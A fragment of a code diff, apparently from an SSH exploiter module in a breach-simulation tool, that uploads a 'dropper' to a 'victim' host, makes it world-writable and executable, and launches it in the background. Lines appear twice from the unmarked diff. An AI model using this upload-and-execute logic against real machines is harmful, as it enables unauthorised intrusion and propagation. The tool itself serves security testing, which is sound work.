ftp.putfo(
file_obj,
self._config.dropper_target_path_linux,
file_size=monkeyfs.getsize(src_path),
callback=self.log_transfer,
)
ftp.chmod(self._config.dropper_target_path_linux, 0o777)
status = ScanStatus.USED
T1222Telem(ScanStatus.USED, "chmod 0777 %s" % self._config.dropper_target_path_linux, self.host).send()
T1222Telem(
ScanStatus.USED,
"chmod 0777 %s" % self._config.dropper_target_path_linux,
self.host,
).send()
ftp.close()
except Exception as exc:
LOG.debug("Error uploading file into victim %r: (%s)", self.host, exc)
status = ScanStatus.SCANNED
T1105Telem(status,
get_interface_to_target(self.host.ip_addr),
self.host.ip_addr,
src_path).send()
T1105Telem(
status, get_interface_to_target(self.host.ip_addr), self.host.ip_addr, src_path
).send()
if status == ScanStatus.SCANNED:
return False
try:
cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
cmdline += build_monkey_commandline(self.host,
get_monkey_depth() - 1,
vulnerable_port=SSH_PORT)
cmdline += build_monkey_commandline(
self.host, get_monkey_depth() - 1, vulnerable_port=SSH_PORT
)
cmdline += " > /dev/null 2>&1 &"
ssh.exec_command(cmdline)
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
self._config.dropper_target_path_linux, self.host, cmdline)
LOG.info(
"Executed monkey '%s' on remote victim %r (cmdline=%r)",
self._config.dropper_target_path_linux,
self.host,
cmdline,
)
ssh.close()
self.add_executed_cmd(cmdline)

Some files were not shown because too many files have changed in this diff Show More